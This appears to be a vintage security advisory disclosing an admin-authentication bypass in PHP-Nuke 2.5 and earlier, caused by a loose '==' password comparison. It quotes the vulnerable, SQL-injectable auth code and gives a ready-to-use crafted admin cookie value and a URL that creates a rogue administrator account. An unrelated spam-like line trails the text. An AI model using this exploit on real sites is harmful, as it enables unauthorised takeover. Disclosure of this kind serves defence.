Summary Security vulnerability in PHP-Nuke, a news site administration package, allows remote attacker to gain administrative access to the application. PHP-Nuke is an open source, freely downloaded at: http://linuxpreview.org/php-nuke.php3?op=english Versions affected: ALL (current PHP-Nuke 2.5 or lower) Details Now let's take a look at how PHP-Nuke authenticates administrative accounts. In the auth.inc.php3 file line 31: $admintest = 0; if(isset($admin)) { if(!IsSet($mainfile)) { include("mainfile.php3"); } $admin = base64_decode($admin); $admin = explode(":", $admin); $aid = "$admin[0]"; $pwd = "$admin[1]"; dbconnect(); $result=mysql_query("select pwd from authors where aid='$aid'"); if(!$result) { echo "Selection from database failed!"; exit; } else { list($pass)=mysql_fetch_row($result); if($pass == $pwd) { $admintest = 1; } } } Here some checks are done for the $admin value. Since any variables, either from cookies or forms (GET/POST) will be automatically made global to the script by PHP, we may put our own $admin value to url. If $pwd (an element of that "scrambled" $admin) does not match the value that corresponds to the fetched row, the false authentication ($admintest = 0) is returned, otherwise we'll be able to access any function in admin.php3. Sounds normal, until you continue to read the following exploit. The Exploit The theory is simply to make $pass == $pwd. We see, the $pass value returned from mysql_fetch_row() could be anything, or could be FALSE if there are no more rows. So how about to make $pwd (string-type) and $pass (logical-type) equally false? Yep, it satisfies the condition. The expression "if($pass == $pwd)" does only compares values, NOT the type. So, setting $pwd = "" (null) will be EQUAL (though not identical) to the given FALSE value of $pass. Next is much simpler. You see, putting any string value NOT listed in the authors database into the $aid will do for us. It gives the TRUE value of mysql_query() and makes mysql_fetch_row() FALSE. So for example, crafting our $admin value: $aid = "blabla"; $pwd = ""; $admin = base64_encode("$aid:$pwd"); will give us "YmxhYmxhOg==". Using this value, we're now able to access all functions in admin.php3. The following URL will add an account "godbless:indonesia" into the authors database: http://site//admin.php3?admin=YmxhYmxhOg%3D%3D&op=AddAuthor&add_aid=godbless&add_name=Godbless&add_pwd=indonesia&add_url=&add_email=fake@mail.me Looking at the options, administrator can edit users, articles, topics, banners, assign authors, etc. Fabian Clone ____________________________________________________________________ Get free email and a permanent address at http://www.amexmail.com/?A=1

亚洲欧美在线